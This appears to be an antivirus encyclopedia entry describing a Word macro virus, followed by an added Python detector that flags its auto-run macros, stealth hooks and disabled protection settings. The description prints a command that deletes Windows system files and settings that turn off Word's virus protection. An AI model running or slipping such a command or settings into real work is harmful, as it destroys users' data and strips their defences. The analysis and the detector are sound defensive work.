Class | Virus |
Platform | MSWord |
Description |
Technical Details

This is a non-polymorphic Word virus. The virus resides in the RedTerrorist module. It has seven subroutines:

AutoOpen
AutoClose
FuckThemAll
ToolsMacro
ToolsCustomize
ViewVBCode
Delay

The virus replicates when a document is opened or closed.

AutoOpen, AutoClose: These procedures only call the main infection routine of the virus, which is in the FuckThemAll routine.

Delay: This macro causes the system to pause before a message window is shown.

    For i = 0 To 19170000
    Next

FuckThemAll: Main virus routine. It checks the system parameter ‘Country’ and, if this is ‘US’, it then runs the command shell:

    "c:command.com C echo y | del " + Environ("windir") + "system*.* > nul"

After that the virus sets the following parameters:

    .SaveNormalPrompt = False
    .VirusProtection = False
    .AllowFastSave = True
    .BackgroundSave = True

The virus checks for the presence in the active document (or normal.dot)

ToolsCustomize, ToolsMacro, ViewVBCode: These three routines are used for stealth; when executed they call the Delay routine and display Message Boxes:

    ToolsMacro: Top level process aborted, cannot continue
    ToolsCustomize: Configuration too large for memory
    ViewVBCode: Error in EXE file, program too big to fit in memory
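As an added example (not part of the original description and not vendor code), the Python below checks macro source text, already extracted from a document by another tool, for the traits listed above: auto-run macros, macros named after the ToolsMacro, ToolsCustomize and ViewVBCode commands, and assignments that switch off Word's virus protection and Normal-template save prompt. The function name, the flagging rule and both sample macros are constructed for illustration.

```python
import re

# Indicators taken from the description above.
AUTO_MACROS = {"autoopen", "autoclose"}
STEALTH_HOOKS = {"toolsmacro", "toolscustomize", "viewvbcode"}
# Options the virus sets to False. AllowFastSave/BackgroundSave are left
# out on the assumption that they are too common to be useful signals.
DISABLED_OPTIONS = {"savenormalprompt", "virusprotection"}

SUB_RE = re.compile(r"^\s*(?:public\s+|private\s+)?sub\s+(\w+)", re.I | re.M)
OPT_RE = re.compile(r"\.(\w+)\s*=\s*(true|false)\b", re.I)

def analyze_macro_source(source):
    """Return findings for VBA source text extracted from a document."""
    subs = {name.lower() for name in SUB_RE.findall(source)}
    opts = {k.lower(): v.lower() for k, v in OPT_RE.findall(source)}
    findings = {
        "auto_macros": sorted(subs & AUTO_MACROS),
        "stealth_hooks": sorted(subs & STEALTH_HOOKS),
        "protection_disabled": sorted(
            k for k in DISABLED_OPTIONS if opts.get(k) == "false"),
    }
    # Flag only when auto-execution is combined with command hooks or
    # with disabling of the safety prompts; AutoOpen alone is common.
    findings["suspicious"] = bool(findings["auto_macros"]) and bool(
        findings["stealth_hooks"] or findings["protection_disabled"])
    return findings

# Constructed, inert sample: names and settings only, no replication code.
SAMPLE_SUSPECT = """
Sub AutoOpen()
    Call Placeholder
End Sub
Sub ToolsMacro()
    MsgBox "Top level process aborted, cannot continue"
End Sub
Sub Placeholder()
    With Options
        .SaveNormalPrompt = False
        .VirusProtection = False
    End With
End Sub
"""

# Constructed benign sample: a legitimate auto-run macro.
SAMPLE_BENIGN = """
Sub AutoOpen()
    ActiveDocument.Fields.Update
End Sub
"""

if __name__ == "__main__":
    print(analyze_macro_source(SAMPLE_SUSPECT))
    print(analyze_macro_source(SAMPLE_BENIGN))
```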